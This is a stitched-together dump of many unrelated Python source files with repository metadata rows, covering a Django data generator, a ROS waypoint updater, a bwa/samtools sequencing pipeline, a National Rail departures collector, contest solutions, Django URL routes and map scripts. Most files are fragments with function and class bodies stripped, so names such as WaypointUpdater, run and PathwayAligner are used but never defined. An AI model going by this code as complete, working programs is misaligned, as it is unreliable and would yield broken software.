febd4c5ea5d37f5d661349afebfd22902257f283 | 1,637 | py | Python | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import random
from random_words import RandomWords
from random_words import LoremIpsum
from django.core.management.base import BaseCommand
from app.models import Tag
from app.models import Post
| 30.314815 | 79 | 0.546121 |
febdebe28a0eb11da7fb60e489e4b8faec751e19 | 1,898 | py | Python | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | 3 | 2021-09-15T02:24:45.000Z | 2021-09-16T03:27:58.000Z | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | null | null | null | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | null | null | null | import numpy as np
import os
| 26.361111 | 72 | 0.682824 |
febed84610cce92ca5a78eecfa305870b18cc6d4 | 6,764 | py | Python | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Waypoint Updater.
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO:
- Stopline location for each traffic light.
"""
import rospy
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import tf
from scipy.spatial import KDTree
import numpy as np
import math
LOOKAHEAD_WPS = 100 # Number of waypoints we will publish. You can change this number
MAX_DECEL = 1. # max. allowed deceleration (m/s^2)
### Deceleration profile functions:
# Proposal by Udacity-walkthrough for deceleration profile:
# Further scaling of profile will be necessary later (still untested, 30/03/2018)
# Entry point: instantiate the node; rospy raises ROSInterruptException on
# shutdown (e.g. Ctrl-C), which we report rather than letting it propagate.
if __name__ == '__main__':
    try:
        WaypointUpdater()
    except rospy.ROSInterruptException:
        rospy.logerr('Could not start waypoint updater node.')
| 35.046632 | 134 | 0.668096 |
febfb7afb944937a4daedbf45bdc05b9348c3b75 | 305 | py | Python | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 50 | 2019-05-23T23:17:19.000Z | 2022-02-19T05:17:00.000Z | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 1 | 2021-04-11T09:38:44.000Z | 2021-04-22T15:14:32.000Z | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 4 | 2019-05-23T23:08:05.000Z | 2021-10-02T21:49:24.000Z | # renames duplicate columns by suffixing _1, _2 etc
| 23.461538 | 51 | 0.481967 |
fec02f47aa5ff13585413d302b592d2cd4c27b9a | 6,111 | py | Python | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | 5 | 2019-11-01T19:38:09.000Z | 2021-03-29T16:13:56.000Z | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | null | null | null | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | 3 | 2021-05-05T20:01:24.000Z | 2022-03-11T15:20:51.000Z | '''
sbc-ngs (c) University of Manchester 2019
All rights reserved.
@author: neilswainston
'''
# pylint: disable=no-member
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-argument
# pylint: disable=wrong-import-order
from __future__ import division
import os
import subprocess
import sys
import uuid
import multiprocessing as mp
import pandas as pd
from sbc_ngs import demultiplex, results, utils, vcf_utils
def _get_barcode_seq(barcode_seq_filename):
    '''Read a barcode -> seq_id mapping from a csv file.

    Args:
        barcode_seq_filename: path to a csv file with `barcode` and
            `seq_id` columns, or a falsy value (None / '') when no
            mapping is supplied.

    Returns:
        dict mapping barcode (str) to seq_id (str), or None when no
        filename was given.
    '''
    # Bug fix: the original computed `None if not filename` but then always
    # called `.set_index(...)` on it, raising AttributeError for a missing
    # filename.  Return early instead.
    if not barcode_seq_filename:
        return None

    # Force str dtype so numeric-looking barcodes (e.g. '001') keep their
    # leading zeros.
    barcode_seq = pd.read_csv(barcode_seq_filename,
                              dtype={'barcode': str, 'seq_id': str})

    return barcode_seq.set_index('barcode')['seq_id'].to_dict()
def _score_alignment(dir_name, barcodes, reads_filename, seq_files,
                     num_threads, write_queue):
    '''Score an alignment.

    Aligns the reads in `reads_filename` against each reference sequence in
    `seq_files` (seq_id -> fasta path) with bwa-mem, sorts the result into a
    BAM file, calls variants with samtools mpileup, and pushes the VCF
    analysis for each reference onto `write_queue`.

    NOTE(review): requires the `bwa` and `samtools` executables on PATH;
    `barcodes[2]` is used as the BAM basename -- presumably a barcode pair
    plus an identifier; confirm against the callers.
    '''
    for seq_id, seq_filename in seq_files.items():
        barcode_dir_name = utils.get_dir(dir_name, barcodes, seq_id)
        bam_filename = os.path.join(barcode_dir_name, '%s.bam' % barcodes[2])
        vcf_filename = bam_filename.replace('.bam', '.vcf')

        # Align with bwa-mem (ont2d preset for Nanopore reads) and pipe the
        # SAM output straight into samtools sort to produce a sorted BAM.
        prc = subprocess.Popen(('bwa', 'mem',
                                '-x', 'ont2d',
                                '-O', '6',
                                '-t', str(num_threads),
                                seq_filename, reads_filename),
                               stdout=subprocess.PIPE)

        subprocess.check_output(('samtools', 'sort',
                                 '-@%i' % num_threads,
                                 '-o', bam_filename, '-'),
                                stdin=prc.stdout)
        prc.wait()

        # Generate and analyse variants file:
        prc = subprocess.Popen(['samtools',
                                'mpileup',
                                '-uvf',
                                seq_filename,
                                '-t', 'DP',
                                '-o', vcf_filename,
                                bam_filename])

        prc.communicate()

        vcf_utils.analyse(vcf_filename, seq_id, barcodes, write_queue)

        print('Scored: %s against %s' % (reads_filename, seq_id))
def _get_seq_files(filename):
    '''Map sequence id (filename stem) to sequence file path.

    If *filename* is a directory, every `.fasta` file directly inside it
    is included, keyed by its name without extension; otherwise *filename*
    itself is returned under its own stem.
    '''
    if not os.path.isdir(filename):
        # Single file: key it by its basename without extension.
        stem, _ = os.path.splitext(os.path.basename(filename))
        return {stem: filename}

    # Directory: collect every *.fasta entry (listdir already yields
    # basenames, so splitext on the entry is sufficient).
    return {
        os.path.splitext(entry)[0]: os.path.join(filename, entry)
        for entry in os.listdir(filename)
        if os.path.splitext(entry)[1] == '.fasta'
    }
def main(args):
    '''main method.

    Expected positional args:
        args[0]: output parent directory (a fresh UUID subdirectory is made)
        args[1]: input directory of read files
        args[2]: minimum read length (int)
        args[3]: maximum number of read files to process (int)
        args[4]: first positional argument to score_alignments (int)
        args[5]: number of threads (int)
        args[6:]: sequence files and/or directories of .fasta files
    '''
    # Merge all supplied sequence sources into one seq_id -> path mapping.
    seq_files = {}

    for seq_file in args[6:]:
        seq_files.update(_get_seq_files(seq_file))

    aligner = PathwayAligner(out_dir=os.path.join(args[0], str(uuid.uuid4())),
                             in_dir=args[1],
                             seq_files=seq_files,
                             min_length=int(args[2]),
                             max_read_files=int(args[3]))

    aligner.score_alignments(int(args[4]), num_threads=int(args[5]))


if __name__ == '__main__':
    main(sys.argv[1:])
| 34.139665 | 79 | 0.540992 |
fec13c651d52b40a5f2248b2a3733321fd5d2e54 | 3,815 | py | Python | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | 14 | 2018-07-12T10:43:00.000Z | 2019-10-19T07:10:59.000Z | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | null | null | null | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | 3 | 2019-07-15T14:32:00.000Z | 2020-02-12T17:53:21.000Z | import argparse
from time import sleep
import requests
import xmltodict
# http://www.nationalrail.co.uk/100296.aspx
# https://lite.realtime.nationalrail.co.uk/OpenLDBWS/
# http://zetcode.com/db/sqlitepythontutorial/
from utils.database import insert_into_db, delete_where, execute_sql
xml_payload = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://thalesgroup.com/RTTI/2016-02-16/ldb/" xmlns:ns2="http://thalesgroup.com/RTTI/2013-11-28/Token/types">
<SOAP-ENV:Header>
<ns2:AccessToken>
<ns2:TokenValue>{KEY}</ns2:TokenValue>
</ns2:AccessToken>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:GetDepBoardWithDetailsRequest>
<ns1:numRows>12</ns1:numRows>
<ns1:crs>{CRS}</ns1:crs>
<ns1:timeWindow>120</ns1:timeWindow>
</ns1:GetDepBoardWithDetailsRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
# url: The URL of the service
# key: Your National Rail API key
# crs: Station code (e.g. THA or PAD)
# Entry point (Python 2): poll the National Rail departures API for each
# requested station forever, refreshing the local SQLite 'departures' table.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='National Rail Data Collector')
    parser.add_argument('--key', help='API Key', required=True)
    parser.add_argument('--url', help='API URL', default="http://lite.realtime.nationalrail.co.uk/OpenLDBWS/ldb9.asmx")
    parser.add_argument('--crs', help='CRS Station Code (default is Thatcham)', default="THA")
    parser.add_argument('--db', help='SQLite DB Name', default="data/trains.db")
    args = parser.parse_args()

    # Ensure the target table exists before the first insert.
    execute_sql(args.db, "create table if not exists departures (crs TEXT, platform TEXT, std TEXT, etd TEXT, origin TEXT, destination TEXT, calling_points TEXT);")

    # --crs accepts a comma-separated list of station codes.
    crs_list = args.crs.split(",")

    while True:
        for crs in crs_list:
            try:
                print "Processing station '{0}'".format(crs)
                departures = fetch_trains(args.url, args.key, crs)
                # Replace-by-delete: drop old rows for this station, then
                # insert the freshly fetched departures.
                delete_where(args.db, "departures", "crs == '{0}'".format(crs))
                insert_into_db(args.db, "departures", departures)
                sleep(1)
            except Exception as e:
                # Best-effort loop: log the error and back off before retrying.
                print e.message
                sleep(10)
| 38.15 | 197 | 0.623853 |
fec152e2fa033df2f5583f6a022b052c96a15f0b | 877 | py | Python | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | """
Problem 12
Highly divisible triangular number
"""
from utility.decorators import timeit, printit
from utility.math_f import sum_naturals_to_n, get_divisors
from math import ceil, sqrt
# Entry point: solve for the first triangular number with over 500 divisors.
# NOTE(review): `run` is imported/defined elsewhere in this file -- confirm.
if __name__ == "__main__":
    n = 500
    run(n)
| 23.078947 | 81 | 0.575827 |
fec193e201ee4720e007a3de6a116f0b7db806c8 | 469 | py | Python | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 31 | 2020-05-13T01:07:55.000Z | 2021-07-13T07:53:26.000Z | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 10 | 2020-05-20T07:22:09.000Z | 2021-07-19T03:52:13.000Z | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 14 | 2020-05-11T05:58:36.000Z | 2021-12-07T03:20:43.000Z | # uninhm
# https://atcoder.jp/contests/abc183/tasks/abc183_d
# data structures, sorting
# Read n intervals [s, t) each demanding p units of water; answer "Yes" iff
# the total simultaneous demand never exceeds capacity w (sweep-line).
n, w = map(int, input().split())
needed = []
for _ in range(n):
    s, t, p = map(int, input().split())
    # Event pairs: +p when an interval starts, -p when it ends.  Sorting
    # places the -p event first at equal times (since -p < p), so an interval
    # ending exactly when another starts does not overlap.
    needed.append((s, p))
    needed.append((t, -p))
needed.sort()
cum = 0
for i in range(len(needed)):
    cum += needed[i][1]
    # Defer the capacity check until all events at this timestamp are applied.
    if i != len(needed)-1 and needed[i+1][0] == needed[i][0]:
        continue
    if cum > w:
        print("No")
        quit()
print("Yes")
| 18.038462 | 61 | 0.558635 |
fec1c9c0fc7bf9b096e6c493b061466eec3c8572 | 635 | py | Python | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
from slackclient import SlackClient
| 24.423077 | 79 | 0.609449 |
fec30b1306550fa1e0b5402e2443b04d91d4ab0b | 678 | py | Python | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | 8 | 2015-04-28T15:31:44.000Z | 2017-02-24T22:57:37.000Z | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | null | null | null | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Idea taken from www.wavepot.com
import math
from AudioPython import *
from AudioPython.dsp import *
n = 44100 / 500
channels = ((sub(bass_osc(n), 0.3),),)
samples = compute_samples(channels)
write_wavefile("temp.wav", samples)
| 21.870968 | 79 | 0.59587 |
fec502d06e7f6b4c2323778a4f480e3ca87b83f7 | 243 | py | Python | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | 1 | 2021-02-10T05:13:29.000Z | 2021-02-10T05:13:29.000Z | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | null | null | null | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | 7 | 2020-09-23T13:10:29.000Z | 2021-12-28T19:03:34.000Z | import frappe | 34.714286 | 72 | 0.740741 |
fec6c828f7c2c56e87c8344597efe1d8c44178c3 | 986 | py | Python | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | 1 | 2020-03-10T18:01:51.000Z | 2020-03-10T18:01:51.000Z | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | 4 | 2020-06-06T01:09:13.000Z | 2021-09-08T01:36:28.000Z | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | null | null | null | from django.urls import path , include
from . import views
from django.conf import settings
from django.conf.urls.static import static
# Route table for the hood app: each URL is wired to a view in hood/views.py
# and given a name for reverse() / {% url %} lookups.
urlpatterns = [
    path('', views.home,name='home'),
    path('profile/', views.profile , name = 'profile'),
    path('update_profile/',views.update_profile,name='update'),
    path('updates/', views.updates, name='updates'),
    path('new/update', views.new_update, name = 'newUpdate'),
    path('posts', views.post, name='post'),
    path('new/post', views.new_post, name='newPost'),
    path('health', views.hosy, name='hosy'),
    path('search', views.search_results, name = 'search_results'),
    path('adminst', views.administration, name='admin'),
    path('business', views.local_biz, name='biz'),
    path('new/business', views.new_biz, name='newBiz'),
    path('create/profile',views.create_profile, name='createProfile'),
]
# During development only, let Django itself serve user-uploaded media files.
# (Fix: the line previously carried dataset-dump residue "| 30.8125 | 81 | ..."
# fused onto it, which made the statement evaluate list | float -> TypeError.)
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
fec70c2989068076b5623aeccec1da14a757918e | 962 | py | Python | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | from typing import List
from .tile import Tile
| 29.151515 | 92 | 0.591476 |
fec8bbb3f41ea8513300db1174bf26c5ac72fcf6 | 7,546 | py | Python | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | null | null | null | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | null | null | null | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | 1 | 2019-03-05T06:50:11.000Z | 2019-03-05T06:50:11.000Z | import logging
import time
import blueforge.apis.telegram as tg
import requests
import urllib.parse
import json
from blueforge.apis.facebook import Message, ImageAttachment, QuickReply, QuickReplyTextItem, TemplateAttachment, \
GenericTemplate, Element, PostBackButton, ButtonTemplate, UrlButton
logger = logging.getLogger(__name__)
BRICK_DEFAULT_IMAGE = 'https://www.chatbrick.io/api/static/brick/img_brick_20_001.png'
| 37.542289 | 115 | 0.373178 |
fec8fbc55d1af1209c9e7e098a82c13f771956eb | 1,195 | py | Python | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.urls import reverse
# Create your models here.
| 31.447368 | 103 | 0.708787 |
fec9f02854eb9eb4fafaedb66ec68d2f2a2ba154 | 152 | py | Python | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | n = float(input("informe um medida em metros: "));
cm = n * 100
mm = n * 1000
print('A medida {}M correspondente a {}Cm e {}Mm'.format(n, cm, mm)) | 21.714286 | 70 | 0.605263 |
fecbabb08af60d46436a84bbcfcf8d984bfc2f0d | 301 | py | Python | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | 1 | 2020-03-23T13:59:40.000Z | 2020-03-23T13:59:40.000Z | # -*- coding: utf-8 -*-
# (c) 2013 Bright Interactive Limited. All rights reserved.
# http://www.bright-interactive.com | info@bright-interactive.com
from import_descendants import import_descendants
import sys
this_module = sys.modules[__name__]
import_descendants(this_module, globals(), locals())
| 33.444444 | 65 | 0.774086 |
feccebf8b7f5ab31a62544c1a696cbcf12f4d112 | 1,264 | py | Python | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | 1 | 2018-11-01T15:05:12.000Z | 2018-11-01T15:05:12.000Z | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | null | null | null | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | null | null | null | import pytest
from tempus_dominus import widgets
| 28.088889 | 58 | 0.761867 |
fece96dc896e75a634255768c6898114b3c6f1c0 | 9,568 | py | Python | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | import folium
from folium import plugins
import numpy as np
import sqlite3 as sqlite
import os
import sys
import pandas as pd
#extract data from yelp DB and clean it:
DB_PATH = "/Users/selinerguncu/Desktop/PythonProjects/Fun Projects/Yelp/data/yelpCleanDB.sqlite"
conn = sqlite.connect(DB_PATH)
#######################################
############ organize data ############
#######################################
#######################################
##### visualize the coordinates #######
#######################################
#######################################
####### cluster nearby points #########
#######################################
# saving the map as an image doesnt seem to work
# import os
# import time
# from selenium import webdriver
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# # for different tiles: https://github.com/python-visualization/folium
# delay=5
# fn='foliumHeatmap.html'
# tmpurl='file:///Users/selinerguncu/Desktop/PythonProjects/Fun%20Projects/Yelp%20Project/Simulation/foliumHeatmap.html'.format(path=os.getcwd(),mapfile=fn)
# mapa.save(fn)
# firefox_capabilities = DesiredCapabilities.FIREFOX
# firefox_capabilities['marionette'] = True
# browser = webdriver.Firefox(capabilities=firefox_capabilities, executable_path='/Users/selinerguncu/Downloads/geckodriver')
# browser.get(tmpurl)
# #Give the map tiles some time to load
# time.sleep(delay)
# browser.save_screenshot('mynewmap.png')
# browser.quit()
| 44.502326 | 302 | 0.666074 |
fecede72453f312f65abb3c7e2bbaa8b798ac96a | 352 | py | Python | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | 1 | 2018-10-07T08:31:49.000Z | 2018-10-07T08:31:49.000Z | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | null | null | null | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | 1 | 2018-09-05T14:59:27.000Z | 2018-09-05T14:59:27.000Z | from . import (
UpdateMethods, AuthMethods, DownloadMethods, DialogMethods,
ChatMethods, MessageMethods, UploadMethods, MessageParseMethods,
UserMethods
)
| 25.142857 | 68 | 0.775568 |
fecf4c8aeffd0ce28d05065c07b1a272ca60037e | 1,529 | py | Python | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | import logging
from ruamel.yaml import YAML
from great_expectations.data_context.data_context.data_context import DataContext
logger = logging.getLogger(__name__)
yaml = YAML()
yaml.indent(mapping=2, sequence=4, offset=2)
yaml.default_flow_style = False
| 33.23913 | 119 | 0.688685 |
fecf532f1524b2d286c4ac2038b09f2f317636bc | 406 | py | Python | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 159 | 2019-02-12T18:22:30.000Z | 2022-03-23T18:49:47.000Z | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 121 | 2019-01-28T18:00:18.000Z | 2022-03-31T17:54:42.000Z | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 27 | 2019-02-12T23:52:33.000Z | 2022-03-07T14:40:24.000Z | """Rio-Cogeo Errors and Warnings."""
| 22.555556 | 66 | 0.738916 |
fecfe168fd1f83e2b06ca1bb819712b3c0b0b0b9 | 293 | py | Python | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | 1 | 2021-01-03T10:40:28.000Z | 2021-01-03T10:40:28.000Z | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | null | null | null | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | 1 | 2021-01-03T10:40:29.000Z | 2021-01-03T10:40:29.000Z | import click
| 10.851852 | 30 | 0.675768 |
fecfe7347f543cbcfbae4629f1a3340b7de24b39 | 1,367 | py | Python | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | '''
Copyright (c) Alex Li 2003. All rights reserved.
'''
__version__ = '0.1'
__file__ = 'rmcompile.py'
import os, getopt, sys
EXTLIST = ['.ptlc', '.pyc']
usage = '''\nUsage: $python %s [OPTION] dir
Remove all .pyc and .ptlc files in the directory recursively.
Options:
-h, --help display this message\n''' % __file__
if __name__ == '__main__':
sys.exit(main())
| 21.030769 | 64 | 0.547184 |
fed030e5255f1c16fe14660b2bdc69ee621a5da4 | 706 | py | Python | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | null | null | null | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | 12 | 2022-02-21T18:57:07.000Z | 2022-03-31T03:06:48.000Z | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | null | null | null | import json
import os
from urllib.request import Request, urlopen
OPSGENIE_KEY = os.getenv("OPSGENIE_KEY", None)
| 28.24 | 81 | 0.651558 |
fed05ac1dfedd9e75b62b9d7eec9b45bc5c84bcd | 366 | py | Python | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-10-07 20:20
from django.db import migrations
| 20.333333 | 54 | 0.612022 |
fed3744cb0d9a7b7d5b538e2e8bb1083ab7dd9b2 | 688 | py | Python | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
